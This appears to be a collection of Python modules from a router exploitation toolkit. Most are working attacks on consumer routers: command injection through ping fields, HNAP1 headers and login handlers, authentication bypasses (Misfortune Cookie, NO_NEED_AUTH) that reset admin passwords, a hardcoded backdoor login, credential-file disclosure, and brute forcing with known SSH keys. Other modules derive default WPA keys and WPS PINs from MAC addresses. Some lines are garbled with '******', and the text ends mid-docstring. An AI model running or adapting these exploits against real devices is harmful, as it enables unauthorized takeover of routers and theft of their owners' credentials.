def get_host_info(self, host_info, index):
    """Fetch extended device/service information for one discovered host.

    Returns early (with a warning) when the host entry is already marked
    ``dataComplete``.  Otherwise the host's XML description is fetched via
    ``self.get_xml`` and parsed by ``self.get_host_information``; failures
    are reported through the print helpers.  A KeyboardInterrupt simply
    aborts the enumeration.
    """
    if host_info is None:
        return
    if host_info['dataComplete']:
        print_warning('Data for this host has already been enumerated!')
        return
    try:
        name = host_info['name']
        print_info("Requesting device and service info for " + name + " (this could take a few seconds)...")
        xml_headers, xml_data = self.get_xml(host_info['xml_file'])
        if not xml_data:
            print_error('Failed to request host XML file:' + host_info['xml_file'])
            return
        if not self.get_host_information(xml_data, xml_headers, index):
            print_error("Failed to get device/service info for " + name)
            return
        print_success('Host data enumeration complete!')
    except KeyboardInterrupt:
        return
def do_run(self, e):
    """Send a blind command-injection request through the ``dst`` field of ``/diagnostic.php``.

    Only the presence of ``<report>OK</report>`` in the reply is checked;
    the command's output is never returned by the target.
    """
    url = "http://%s:%s/diagnostic.php" % (self.host, self.port)
    # self.command is placed inside the ping destination field between '&' separators.
    payload = {'act': 'ping', 'dst': '& %s&' % self.command}
    headers = {
        'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
        # NOTE(review): the value repeats the header name; sent verbatim as-is.
        'Accept-Language': 'Accept-Language: en-us,en;q=0.5',
        'Accept-Encoding': 'gzip, deflate',
        'Content-Type': 'application/x-www-form-urlencoded;charset=utf-8'
    }
    try:
        print_warning("Sending exploit")
        response = requests.post(url, headers=headers, data=payload, timeout=60)
        # Success marker only proves the request was accepted, not that the command ran.
        if "<report>OK</report>" in response.text:
            print_success("output not available this is blind injection")
        else:
            print_error(
                "could not find marker in response, exploit failed")
    except requests.Timeout:
        print_error("timeout")
    except requests.ConnectionError:
        print_error("exploit failed")
def do_run(self, e):
    """Check the target for the RomPager 'Misfortune Cookie' condition.

    Requests ``/blabla`` with cookie ``C107373883=/omg1337hax``.  A 404 from
    a server whose ``Server`` header mentions RomPager is expected; the
    device is reported vulnerable when the cookie value is reflected in the
    404 body.
    """
    user_agent = 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)'
    headers = {'User-Agent': user_agent,
               'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
               # (sic) 'q,0.3' is sent verbatim
               'Accept-language': 'sk,cs;q=0.8,en-US;q=0.5,en;q,0.3',
               'Connection': 'keep-alive',
               'Accept-Encoding': 'gzip, deflate',
               'Cache-Control': 'no-cache',
               'Cookie': 'C107373883=/omg1337hax'}
    # self.port is concatenated, so it must be a str here.
    target = 'http://' + self.host + ":" + self.port + '/blabla'
    try:
        response = requests.get(target, headers=headers, timeout=60)
        if response.status_code != 404:
            print_failed("Unexpected HTTP status, expecting 404 got: %d" % response.status_code)
            print_red("Device is not running RomPager")
        else:
            # requests header lookup is case-insensitive, so 'server' matches 'Server'.
            if 'server' in response.headers:
                server = response.headers.get('server')
                if re.search('RomPager', server) is not None:
                    print_green("Got RomPager! Server:%s" % server)
                    if re.search('omg1337hax', response.text) is not None:
                        print_success("device is vulnerable to misfortune cookie")
                    else:
                        print_failed("test didn't pass.")
                        print_warning("Device MAY still be vulnerable")
                else:
                    print_failed("RomPager not detected, device is running: %s " % server)
            else:
                print_failed("Not running RomPager")
    except requests.exceptions.Timeout:
        print_error("Timeout!")
    except requests.exceptions.ConnectionError:
        print_error("No route to host")
def do_run(self, e):
    """Request the ``DEVICE.ACCOUNT`` service from ``/getcfg.php`` and print returned account data.

    A password of ``==OoXxGgYy==`` is the device's placeholder value and is
    treated as failure.
    """
    url = "http://%s:%s/getcfg.php" % (self.host, self.port)
    payload = {'SERVICES': 'DEVICE.ACCOUNT'}
    headers = {'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
               'Accept-Language': 'Accept-Language: en-us,en;q=0.5',
               'Accept-Encoding': 'gzip, deflate',
               'Content-Type': 'application/x-www-form-urlencoded;charset=utf-8'
               }
    try:
        print_warning("Sending exploit")
        response = requests.post(url, headers=headers, data=payload, timeout=60)
        if "<service>DEVICE.ACCOUNT</service>" in response.text:
            # Greedy '(.*)' within one line: a line holding several tags yields one long match.
            usernames = re.findall("<name>(.*)</name>", response.text)
            passwords = re.findall("<password>(.*)</password>", response.text)
            if "==OoXxGgYy==" in passwords:
                print_error("Exploit failed, router responded with default value ==OoXxGgYy==")
            else:
                print_success("")
                for i in range(len(usernames)):
                    # NOTE(review): the remainder of this method is garbled in the
                    # source as received ('******'); the original statements cannot
                    # be recovered, so the text is kept verbatim.
                    print("Username: "******"Password: "******"Exploit failed")
    except requests.Timeout:
        print_error("timeout")
    except requests.ConnectionError:
        print_error("exploit failed")
def do_run(self, e):
    """Check for and use the ``ui_debug`` command interface of ``/debug.cgi``.

    Authenticates with the fixed basic-auth pair in the code (presumably a
    built-in account of the target — confirm), sends ``echo 741852`` as a
    canary and, only if it is echoed back, submits ``self.command`` and
    prints the output captured from the ``<textarea>``.
    """
    url = "http://%s:%s/debug.cgi" % (self.host, self.port)
    data = {"data1": "echo 741852", "command": "ui_debug"}
    try:
        response = requests.post(url=url, data=data, auth=("Gemtek", "gemtekswd"), timeout=60)
        # NOTE(review): when the pattern does not match, result[0] raises IndexError,
        # which is not among the exceptions handled below (only TypeError is).
        result = re.findall(
            "<textarea rows=30 cols=100>\\n(.*)\\n</textarea>", response.text)
        if "741852" == result[0]:
            print_success("Target is vulnerable")
            data = {"data1": self.command, "command": "ui_debug"}
            response = requests.post(url=url, data=data, auth=("Gemtek", "gemtekswd"), timeout=60)
            result = re.findall(
                "<textarea rows=30 cols=100>\\n(.*)\\n</textarea>", response.text)
            print(result[0])
        else:
            print_error("target is not vulnerable")
    except requests.Timeout:
        print_error("timeout")
    except requests.ConnectionError:
        print_error("exploit failed")
    except TypeError:
        print_error("Something went wrong in answer parsing")
def auth_bypass(self):
    """Send the cookie-based request intended to disable HTTP authentication on the target.

    Cookie ``C<self.number>`` is set to ``self.offset`` bytes of 'B' followed
    by a NUL byte; any response with status <= 302 is reported as success.
    """
    user_agent = 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)'
    headers = {
        'User-Agent': user_agent,
        'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
        'Accept-language': 'sk,cs;q=0.8,en-US;q=0.5,en;q,0.3',
        'Connection': 'keep-alive',
        'Accept-Encoding': 'gzip, deflate',
        'Cache-Control': 'no-cache',
        # NOTE(review): recent requests/urllib3 releases validate header values and
        # may reject the trailing NUL before anything is sent; that error is not
        # caught below — confirm with the pinned requests version.
        'Cookie': 'C' + str(self.number) + '=' + 'B' * self.offset + '\x00'
    }
    # self.port is concatenated, so it must be a str here.
    target = 'http://' + self.host + ":" + self.port
    try:
        response = requests.get(target, headers=headers, timeout=60)
        # 'response is not None' is always true once get() returns; any 1xx-3xx counts.
        if response is not None and response.status_code <= 302:
            print_success(
                "Exploit sent, please check http://%s:%s authentication should be disabled" % (self.host, self.port))
        else:
            print_error("Exploit failed")
    except requests.exceptions.Timeout:
        print_error("Timeout!")
    except requests.exceptions.ConnectionError:
        print_error("No route to host")
def do_run(self, e):
    """Check the target for the RomPager 'Misfortune Cookie' condition (httplib2 variant).

    Same logic as the requests-based check: GET ``/blabla`` with cookie
    ``C107373883=/omg1337hax``, expect a 404 from a RomPager server and
    look for the cookie value reflected in the body.
    """
    #httplib2.debuglevel = 1
    user_agent = 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)'
    headers = {'User-Agent': user_agent,
               'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
               # (sic) 'q,0.3' is sent verbatim
               'Accept-language': 'sk,cs;q=0.8,en-US;q=0.5,en;q,0.3',
               'Connection': 'keep-alive',
               'Accept-Encoding': 'gzip, deflate',
               'Cache-Control': 'no-cache',
               'Cookie': 'C107373883=/omg1337hax'}
    # self.port is concatenated, so it must be a str here.
    target = 'http://' + self.host + ":" + self.port + '/blabla'
    h = httplib2.Http(timeout=60)
    h.follow_all_redirects = True
    try:
        # httplib2 returns a dict-like response (keys()/get() used below) plus raw bytes.
        response, content = h.request(target, 'GET', headers=headers)
        if response.status != 404:
            print_failed("Unexpected HTTP status, expecting 404 got: %d" % response.status)
            print_red("Device is not running RomPager")
        else:
            if 'server' in response.keys():
                server = response.get('server')
                if re.search('RomPager', server) is not None:
                    print_green("Got RomPager! Server:%s" % server)
                    # content is bytes; decode() assumes UTF-8 and will raise on other encodings.
                    if re.search('omg1337hax', content.decode()) is not None:
                        print_success("device is vulnerable to misfortune cookie")
                    else:
                        print_failed("test didn't pass.")
                        print_warning("Device MAY still be vulnerable")
                else:
                    print_failed("RomPager not detected, device is running: %s " % server)
            else:
                print_failed("Not running RomPager")
    except socket.timeout:
        # Is there a better way of handling timeout in httplib2?
        # NOTE(review): connection refused / unreachable host is not caught here.
        print_error("Timeout!")
def do_run(self, e):
    """Send ``self.command`` to ``/command.php`` and print the output returned.

    The form body is built by hand with ``urllib.parse.quote`` (only ``/``
    and ``=`` left unencoded) because ``requests`` would otherwise encode
    the whole dict; the marker ``end`` appended to the command is then
    searched for in the response.
    """
    url = "http://%s:%s/command.php" % (self.host, self.port)
    payload = {'cmd': '%s; echo end' % self.command}
    headers = {'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
               'Accept-Language': 'Accept-Language: en-us,en;q=0.5',
               'Accept-Encoding': 'gzip, deflate',
               'Content-Type': 'application/x-www-form-urlencoded;charset=utf-8'
               }
    try:
        print_yellow("Sending exploit")
        # Requests forces URI encoding and can't be turned off
        # so we have to prepare HTTP request manually and modify it with urllib.parse.quote before sending
        request = requests.Request('POST', url, headers=headers, data=payload)
        r = request.prepare()
        # print("Before modification:", r.body)
        r.body = urllib.parse.quote('cmd=%s; echo end' % self.command, safe='/=')
        # NOTE(review): header value is an int, not a str — confirm the HTTP stack accepts it.
        r.headers.update({'Content-Length': len(r.body)})
        # print("After modification:", r.body)
        s = requests.Session()
        response = s.send(r, timeout=15)
        s.close()
        # This won't work
        # response = requests.post(url, headers=headers, data=payload, proxies=proxies, timeout=60)
        # NOTE(review): the check is for the substring "end" (not the "end8758" the
        # comment mentions), so any page containing "end" passes.
        if "end" in response.text:  # end8758 is unique tag to search for in output
            print_success("output of %s:" % self.command)
            print_green(response.text)
        else:
            print_error("could not find marker in response, exploit failed")
    except requests.Timeout:
        print_error("timeout")
    except requests.ConnectionError:
        print_error("exploit failed or you killed httpd")
def do_run(self, e):
    """Try each SSH private key stored in ``databases/bad_keys.db`` against ``self.host``.

    Rows are (user, port, filename, type, private_key).  RSA and DSA keys
    are loaded with paramiko and used for a key-only login; on success the
    key material is written to ``<filename>.key``.
    """
    print_info("Testing known keys")
    client = paramiko.SSHClient()
    # AutoAddPolicy trusts whatever host key the server presents (no verification).
    client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
    # NOTE(review): neither the connection nor the cursor is closed afterwards.
    connection = core.loader.open_database("./databases/bad_keys.db")
    cursor = connection.cursor()
    cursor.execute("SELECT user, port, filename, type, private_key FROM keys;")
    entries = cursor.fetchall()
    for entry in entries:
        try:
            username = entry[0]
            port = entry[1]
            filename = entry[2]
            key_type = entry[3]
            string_key = entry[4]
            if key_type == 'RSA':
                private_key = paramiko.RSAKey.from_private_key(io.StringIO(string_key))
            elif key_type == 'DSA':
                private_key = paramiko.DSSKey.from_private_key(io.StringIO(string_key))
            else:
                print_error("Failed to load key of type:", key_type)
                continue
            client.connect(self.host, port=port, username=username, pkey=private_key, look_for_keys=False, timeout=10)
            # The key is stored under the database filename with a ".key" suffix.
            core.io.writetextfile(string_key, filename+".key")
            # NOTE(review): this line is garbled in the source as received ('******'); kept verbatim.
            print_success("Username:"******"port:", port)
            print_info("Private key writen to:", filename+".key")
            # Only closed on the success path; the loop keeps trying the remaining keys.
            client.close()
        except paramiko.AuthenticationException:
            pass
        # NOTE(review): a bare except also swallows KeyboardInterrupt and any
        # programming error (e.g. a malformed row), so failures are invisible.
        except:
            pass
def do_run(self, e):
    """Probe and use command injection through the ``reqMethod`` parameter of ``/login_handler.php``.

    The body is posted as a raw string so the embedded quotes and ``;`` are
    sent unencoded.  ``echo 741852`` acts as a canary; only when it appears
    in the response is ``self.command`` submitted and the raw reply printed.
    """
    url = "http://%s:%s/login_handler.php" % (self.host, self.port)
    headers = {
        'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
        'Accept-Language': 'Accept-Language: en-us,en;q=0.5',
        'Content-Type': 'application/x-www-form-urlencoded;charset=utf-8'
    }
    data = 'reqMethod=json_cli_reqMethod" "json_cli_jsonData"; echo "741852'
    try:
        response = requests.post(url=url, headers=headers, data=data, timeout=60)
        if "741852" in response.text:
            print_success("target is vulnerable")
            # Not so sure about quoting of commands that has arguments
            data = 'reqMethod=json_cli_reqMethod" "json_cli_jsonData"; %s' % self.command
            response = requests.post(url=url, headers=headers, data=data, timeout=60)
            print(response.text)
        elif "failure" in response.text:
            print_error("Exploit failed, target is probably patched")
            print(response.text)
        # Any other response body is silently ignored.
    except requests.Timeout:
        print_error("exploit failed")
    except requests.ConnectionError:
        print_error("exploit failed")
def do_run(self, e):
    """Send ``self.command`` inside the HNAP1 ``SOAPAction`` header (backtick substitution).

    A ``ConnectionError`` after the POST is interpreted as success
    (apparently the default payload is expected to stop httpd); the
    operator is then offered a telnet session to dump ``/var/config.xml``.
    """
    url = "http://%s:%s/HNAP1" % (self.host, self.port)
    headers = {
        "SOAPAction": '"http://purenetworks.com/HNAP1/GetDeviceSettings/`%s`"' % self.command
    }
    try:
        print_warning("Sending exploit")
        requests.post(url, headers=headers, timeout=60)
        print_warning(
            "HTTPd is still responding this is OK if you changed the payload"
        )
    except requests.ConnectionError:
        print_success("exploit sent.")
        answer = query_yes_no(
            "Do you wish to dump all system settings? (if telned was started)"
        )
        if answer is True:
            # NOTE(review): telnet uses self.port, i.e. the same port as the HTTP
            # request above — confirm that is intended. telnetlib was removed from
            # the standard library in Python 3.13.
            tn = telnetlib.Telnet(self.host, self.port)
            print_info("Sending command through telnet")
            tn.read_until(b'#', timeout=15)
            tn.write(b"xmldbc -d /var/config.xml; cat /var/config.xml\n")
            # read_until returns whatever arrived within the timeout, possibly truncated.
            response = tn.read_until(b'#', timeout=15)
            tn.close()
            print_info("Writing response to config.xml")
            # decode('ascii') raises UnicodeDecodeError on non-ASCII config content.
            writetextfile(response.decode('ascii'), "config.xml")
        print_warning(
            "Don't forget to restart httpd or reboot the device")
    except requests.Timeout:
        print_error("timeout")
def do_run(self, e):
    """Print default SSID/WPA-key candidates derived from ``self.mac``.

    Non-hex characters are stripped from the MAC first.  The values are
    printed once for the MAC as given ("rg_mac") and once after the last
    octet has been decreased by 5 ("BSSID"); ``self.gen_key`` performs the
    key derivation on the octet array.
    """
    octets = bytearray.fromhex(re.sub(r'[^a-fA-F0-9]', '', self.mac))
    print_success("")
    print_green('based on rg_mac:\nSSID: PBS-%02X%02X%02X' % (octets[3], octets[4], octets[5]))
    print_green('WPA key: %s\n' % self.gen_key(octets))
    # bytearray items must stay within 0..255, so a last octet below 5 raises ValueError here.
    octets[5] -= 5
    print_green('based on BSSID:\nSSID: PBS-%02X%02X%02X' % (octets[3], octets[4], octets[5]))
    print_green('WPA key: %s\n' % self.gen_key(octets))
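def do_run(self, e):
    """Decompress the firmware image at ``self.input_file``.

    The whole file is read and passed to ``self.decompress_firmware``; when
    that returns data it is written to ``fw.decomp`` via ``core.io.writefile``
    and the filesystem is then extracted with ``self.decompress_fs_only``
    into the directory ``writefile`` returned.
    """
    # A context manager closes the handle even when read() raises; the
    # original open()/close() pair leaked it on that path.
    with open(self.input_file, 'rb') as f:
        data = f.read()
    result = self.decompress_firmware(data)
    if result is not None:
        dirpath = core.io.writefile(result, "fw.decomp")
        print_success("Decompressed firmware written to fw.decomp")
        self.decompress_fs_only(data, dirpath)
        print_success("FS decompressed")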
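def do_run(self, e):
    """Decode the config file at ``self.input_file`` and print the credentials it holds.

    ``self.de_cfg`` returns a format tag and the decoded bytes; unless the
    tag is ``CFG_RAW`` the decoded data is saved to ``config.out`` and the
    login/password pair extracted by ``self.get_credentials`` is printed,
    with ``admin`` substituted for an empty value.
    """
    # A context manager closes the handle even when read() raises; the
    # original open()/close() pair leaked it on that path.
    with open(self.input_file, 'rb') as f:
        data = f.read()
    g, outdata = self.de_cfg(data)
    if g != self.CFG_RAW:
        core.io.writefile(outdata, "config.out")
        print_success("config file written to config.out, extracting credentials...")
        creds = self.get_credentials(outdata)
        # Empty fields mean the device default, which this decoder reports as "admin".
        login = creds[0] if creds[0] != b"" else b"admin"
        password = creds[1] if creds[1] != b"" else b"admin"
        print_green("Login :\t" + login.decode())
        print_green("Password :\t" + password.decode())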
def decrypt_cfg(self, data):
    """Decrypt config, bruteforce if default key fails"""
    # Model id is a big-endian uint16 extracted by get_modelid(); rendered as "V%04X".
    modelstr = "V" + format(unpack(">H", self.get_modelid(data))[0], "04X")
    print_info('Model is :\t' + modelstr)
    # The default key is derived from the model string.
    ckey = self.make_key(modelstr)
    # Everything from offset 0x100 on is the encrypted body (presumably a 0x100-byte header precedes it).
    rdata = self.decrypt(data[0x100:], ckey)
    # if the decrypted data does not look good, bruteforce
    if self.smart_guess(rdata) != self.CFG_LZO:
        rdata = self.brute_cfg(data[0x100:])
    # NOTE(review): ckey is still the default key here even when brute_cfg found a different one.
    print_success('Used key :\t[0x%02X]' % ckey)
    # Header is copied through with byte 0x2D forced to 0x01 (meaning not shown here — confirm).
    return data[:0x2D] + b'\x01' + data[0x2E:0x100] + rdata
def brute_cfg(self, data):
    """Check all possible keys until data looks like decrypted"""
    rdata = None
    key = 0
    # Single-byte key space.
    for i in range(256):
        rdata = self.decrypt(data, i)
        if self.smart_guess(rdata) == self.CFG_LZO:
            key = i
            break
    # NOTE(review): when no key matches, rdata is the output for key 0xFF and
    # 'Found key: [0x00]' is still printed — callers cannot tell the two cases apart.
    print_success('Found key:\t[0x%02X]' % key)
    return rdata
def do_run(self, e):
    """Check the ``NO_NEED_AUTH=1&AUTH_GROUP=0`` authentication bypass and, if present, set a new admin password.

    The GET on ``tools_admin.php`` counts as vulnerable when it returns 200
    and contains the password form; the same bypass parameters are then
    POSTed together with ``self.password`` for user ``admin``.
    """
    url = "http://%s:%s/tools_admin.php?NO_NEED_AUTH=1&AUTH_GROUP=0" % (
        self.host, self.port)
    try:
        print_yellow("Sending exploit")
        response = requests.get(url, timeout=60)
        if response.status_code == 200 and 'name="admin_password1"' in response.text:
            print_success("target seems vulnerable")
            print_green(
                "You can visit any page by adding ?NO_NEED_AUTH=1&AUTH_GROUP=0 to URL"
            )
            print_yellow("Changing admin password")
            headers = {
                'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
                'Accept-Language': 'Accept-Language: en-us,en;q=0.5',
                'Accept-Encoding': 'gzip, deflate',
                'Content-Type': 'application/x-www-form-urlencoded;charset=utf-8'
            }
            payload = {
                'NO_NEED_AUTH': 1,
                'AUTH_GROUP': 0,
                'ACTION_POST': 1,
                'apply': 'Save+Settings',
                'admin_name': 'admin',
                'admin_password1': '%s' % self.password,
                'admin_password2': '%s' % self.password,
                'grap_auth_enable_h': 0,
                'rt_ipaddr': '0.0.0.0'
            }
            url = "http://%s:%s/tools_admin.php" % (self.host, self.port)
            # This POST changes the device's admin password; nothing here reverts it.
            response = requests.post(url=url, headers=headers, data=payload, timeout=60)
            # A 200 only shows the form was accepted, not that the password was applied.
            if response.status_code == 200:
                print_success(
                    "password seems to be changed try to login with: %s" % self.password)
            else:
                print_error("password change failed")
        else:
            print_error("exploit failed")
    except requests.Timeout:
        print_error("timeout")
    except requests.ConnectionError:
        print_error("exploit failed")
def do_run(self, e):
    """Compute a WPS PIN candidate from ``self.mac`` using the Fibonacci-based scheme.

    Each MAC octet is reduced to a Fibonacci index, the indices are weighted
    with ``self.fib_gen`` from ``seed`` onward, the sum is folded modulo
    10^7 and ``self.compute_checksum`` supplies the eighth digit.
    NOTE(review): the source as received had no indentation; the nesting of
    the reduction branches below was reconstructed and should be confirmed
    against upstream.
    """
    mac = self.mac
    mac = mac.upper()
    mac = mac.replace("-", "")
    mac = mac.replace(":", "")
    fibnum = [0, 0, 0, 0, 0, 0]
    fibsum = 0
    seed = 16
    count = 1  # unused
    offset = 0  # unused
    counter = 0
    a = 0
    macs = [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0]
    tmp = [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0]
    c = 0
    # Parse the 12 hex digits into 6 octets; macs keeps the raw values, tmp is reduced below.
    while c < 12:
        macs[a] = int(mac[c]+mac[c+1], 16)
        tmp[a] = int(mac[c] + mac[c+1], 16)
        a += 1
        c += 2
    for i in range(6):
        # Octets above 30 are reduced by repeated -16; counter records the steps.
        if tmp[i] > 30:
            while tmp[i] > 31:
                tmp[i] -= 16
                counter += 1
        if counter == 0:
            if tmp[i] < 3:
                # Very small octets are replaced by (sum of all octets) - this octet.
                tmp[i] = tmp[0]+tmp[1]+tmp[2]+tmp[3]+tmp[4]+tmp[5]-tmp[i]
                if tmp[i] > 0xff:
                    # NOTE(review): this is a boolean 'and', not bitwise '&', so
                    # tmp[i] becomes 0xff for any non-zero value; preserved as-is.
                    tmp[i] = tmp[i] and 0xff
                tmp[i] = int(tmp[i] % 28) + 3
            fibnum[i] = self.fib_gen(tmp[i])
        else:
            fibnum[i] = self.fib_gen(tmp[i]) + self.fib_gen(counter)
            counter = 0
    for i in range(6):
        fibsum += (fibnum[i] * self.fib_gen(i+seed))+macs[i]
    # Keep seven digits; the eighth is the checksum appended below.
    fibsum %= 10000000
    checksum = self.compute_checksum(fibsum)
    fibsum = (fibsum * 10) + checksum
    print_success("")
    print_green("WPS PIN: " + str(fibsum))
def do_run(self, e):
    """Print the Sitecom default SSID and the WPA keys for the WLR-4000/4004 models.

    The MAC from ``self.mac`` is normalised (upper-case, separators removed);
    the SSID uses its last six hex digits and ``self.generate_key`` derives
    one key per model code.
    """
    mac = self.mac.upper().replace("-", "").replace(":", "")
    ssid = "Sitecom%s" % mac[6:].upper()
    keys = {model: self.generate_key(mac, model) for model in ("4000", "4004")}
    print_success("WPA keys generated")
    print("SSID:" + ssid)
    print("WPA Key for model WLR-4000: " + keys["4000"])
    print("WPA Key for model WLR-4004: " + keys["4004"])
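def do_run(self, e):
    """Decode the config file at ``self.input_file`` and print the credentials it holds.

    ``self.de_cfg`` returns a format tag and the decoded bytes; unless the
    tag is ``CFG_RAW`` the decoded data is saved to ``config.out`` and the
    login/password pair extracted by ``self.get_credentials`` is printed,
    with ``admin`` substituted for an empty value.
    """
    # A context manager closes the handle even when read() raises; the
    # original open()/close() pair leaked it on that path.
    with open(self.input_file, 'rb') as f:
        data = f.read()
    g, outdata = self.de_cfg(data)
    if g != self.CFG_RAW:
        core.io.writefile(outdata, "config.out")
        print_success(
            "config file written to config.out, extracting credentials...")
        creds = self.get_credentials(outdata)
        # Empty fields mean the device default, which this decoder reports as "admin".
        login = creds[0] if creds[0] != b"" else b"admin"
        password = creds[1] if creds[1] != b"" else b"admin"
        print_green("Login :\t" + login.decode())
        print_green("Password :\t" + password.decode())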
def do_run(self, e):
    """Fetch ``/var/etc/httpasswd`` through the ``REQUIRE_FILE`` parameter of ``__show_info.php``.

    A 200 whose body contains ``<center>`` is treated as success; the text
    following the tag is printed as the credentials.
    """
    url = "http://%s:%s/model/__show_info.php?REQUIRE_FILE=/var/etc/httpasswd" % (self.host, self.port)
    try:
        print_yellow("Sending exploit")
        response = requests.get(url, timeout=60)
        if response.status_code == 200 and "<center>" in response.text:
            print_success("credentials fetched")
            # The pattern depends on the page's exact whitespace (newline + three tabs);
            # if it does not match, credentials[0] raises an uncaught IndexError.
            credentials = re.findall("<center>\n\t\t\t(.*)", response.text)
            print(credentials[0])
        # Any other status or body is silently ignored (no else branch).
    except requests.Timeout:
        print_error("timeout")
    except requests.ConnectionError:
        print_error("exploit failed")
def do_run(self, e):
    """Fetch ``/var/etc/httpasswd`` through the ``REQUIRE_FILE`` parameter of ``__show_info.php``.

    A 200 whose body contains ``<center>`` is treated as success; the text
    following the tag is printed (in green) as the credentials.
    """
    url = "http://%s:%s/model/__show_info.php?REQUIRE_FILE=/var/etc/httpasswd" % (self.host, self.port)
    try:
        print_yellow("Sending exploit")
        response = requests.get(url, timeout=60)
        if response.status_code == 200 and "<center>" in response.text:
            print_success("credentials fetched")
            # The pattern depends on the page's exact whitespace (newline + three tabs);
            # if it does not match, credentials[0] raises an uncaught IndexError.
            credentials = re.findall("<center>\n\t\t\t(.*)", response.text)
            print_green(credentials[0])
        # Any other status or body is silently ignored (no else branch).
    except requests.Timeout:
        print_error("timeout")
    except requests.ConnectionError:
        print_error("exploit failed")
def do_run(self, e):
    """Print the Discus default SSID and WPA key derived from ``self.mac``.

    The lower 24 bits of the MAC (last six hex digits, separators removed)
    give the SSID suffix; the key is ``YW0`` followed by
    ``(lower24 - 0xD0EC31) // 4`` in decimal.
    """
    normalised = self.mac.upper().replace("-", "").replace(":", "")
    lower_half = normalised[6:]
    # Integer floor division, so the result is negative for small MAC values.
    derived = (int(lower_half, 16) - 0xD0EC31) // 4
    print_success("")
    print_green("Possible SSID: " + ("Discus--" + lower_half))
    print_green("WPA Key: " + ("YW0" + str(derived)))
def do_run(self, e):
    """Attempt the Netgear ``BRS_netgear_success.html`` authentication bypass.

    If the root page answers 401, the success page is requested three
    times (one second apart) and the root page is fetched again; a 200 is
    reported as a successful bypass.
    """
    # self.port is concatenated, so it must be a str here.
    target = "http://" + self.host + ":" + self.port
    try:
        response = requests.get(target, timeout=60)
        if response.status_code == requests.codes.unauthorized:
            print_yellow("Password protection detected")
            for i in range(0, 3):
                time.sleep(1)
                requests.get(target+"/BRS_netgear_success.html", timeout=60)
            response = requests.get(target, timeout=60)
            if response.status_code == requests.codes.ok:
                print_success("bypass successful. Now use your browser to have at look at the admin interface.")
            # A root page that is not 401 to begin with produces no output at all.
    except requests.RequestException:
        # Catches every requests error, not only timeouts, despite the message.
        print_error("timeout!")
def do_update(self, e):
    """Handle the ``update`` shell command.

    The first whitespace-separated word of ``e`` selects the action:
    ``oui`` rebuilds the OUI database, ``force`` discards local changes
    before updating REXT, and an empty argument performs a normal update.
    Anything else is ignored.
    """
    def update_oui():
        print_info("Updating OUI DB. Database rebuild may take several minutes.")
        updater.update_oui()
        print_success("OUI database updated successfully.")

    def update_force():
        print_info("Discarding local changes and updating REXT")
        updater.update_rext_force()

    def update_default():
        print_info("Updating REXT please wait...")
        updater.update_rext()
        print_success("Update successful")

    actions = {"oui": update_oui, "force": update_force, "": update_default}
    action = actions.get(e.split(' ')[0])
    if action is not None:
        action()
def do_run(self, e):
    """Compute the EasyBox default SSID and WPA2 key from ``self.mac``.

    Mixes the decimal digits of the last two MAC octets with the last six
    hex nibbles of the MAC through two 4-bit keys.
    """
    mac = self.mac
    mac = mac.replace(":", "")
    mac = mac.replace("-", "")
    # Last two octets as a decimal string, left-padded to five digits.
    c1 = str(int(mac[8:], 16))
    while len(c1) < 5:
        c1 = "0" + c1
    # s6..s10: the five decimal digits (parsed as base 16, which is harmless for 0-9).
    s6 = int(c1[0], 16)
    s7 = int(c1[1], 16)
    s8 = int(c1[2], 16)
    s9 = int(c1[3], 16)
    s10 = int(c1[4], 16)
    # m7..m12: the last six hex nibbles of the MAC (int(..., 16) accepts either case).
    m7 = int(mac[6], 16)
    m8 = int(mac[7], 16)
    m9 = int(mac[8], 16)
    m10 = int(mac[9], 16)
    m11 = int(mac[10], 16)
    m12 = int(mac[11], 16)
    # Two 4-bit mixing keys.
    k1 = (s7 + s8 + m11 + m12) & 0x0F
    k2 = (m9 + m10 + s9 + s10) & 0x0F
    x1 = k1 ^ s10
    x2 = k1 ^ s9
    x3 = k1 ^ s8
    y1 = k2 ^ m10
    y2 = k2 ^ m11
    y3 = k2 ^ m12
    z1 = m11 ^ s10
    z2 = m12 ^ s9
    z3 = k1 ^ k2
    # Nibbles are emitted as lower-case hex; the key is upper-cased when printed.
    ssid = "EasyBox-" + format(m7, 'x') + format(m8, 'x') + format(m9, 'x') \
        + format(m10, 'x') + format(s6, 'x') + format(s10, 'x')
    wpakey = format(x1, 'x') + format(y1, 'x') + format(z1, 'x') + \
        format(x2, 'x') + format(y2, 'x') + format(z2, 'x') + \
        format(x3, 'x') + format(y3, 'x') + format(z3, 'x')
    print_success("WPA2 key generated")
    print("SSID:" + ssid)
    print("WPA2KEY:" + wpakey.upper())
def do_run(self, e):
    """Download ``/rom-0`` from the target without authentication and check whether ``/rpFWUpload.html`` is reachable.

    The rom-0 body is saved as ``rom-0`` only when the server returns 200
    with ``Content-Type: application/octet-stream``.
    """
    # self.port is concatenated, so it must be a str here.
    target = "http://" + self.host + ":" + self.port
    try:
        response = requests.get(target + "/rom-0", timeout=60)
        content_type = 'application/octet-stream'
        # Exact header comparison: a charset suffix or different casing would not match.
        if response.status_code == requests.codes.ok and response.headers.get('Content-Type') == content_type:
            print_success("got rom-0 file, size:" + str(len(response.content)))
            core.io.writefile(response.content, "rom-0")
        else:
            print_error("failed")
        print_info("Checking if rpFWUpload.html is available")
        response = requests.get(target + "/rpFWUpload.html", timeout=60)
        if response.status_code == requests.codes.ok:
            print_success("rpFWUpload.html is accessible")
        else:
            print_failed("rpFWUpload.html is not accessible")
    except requests.RequestException:
        # Catches every requests error, not only timeouts, despite the message.
        print_error("timeout!")
def do_run(self, e):
    """Retrieve the device configuration via an empty multipart POST to ``manager_dev_config_t.gch``.

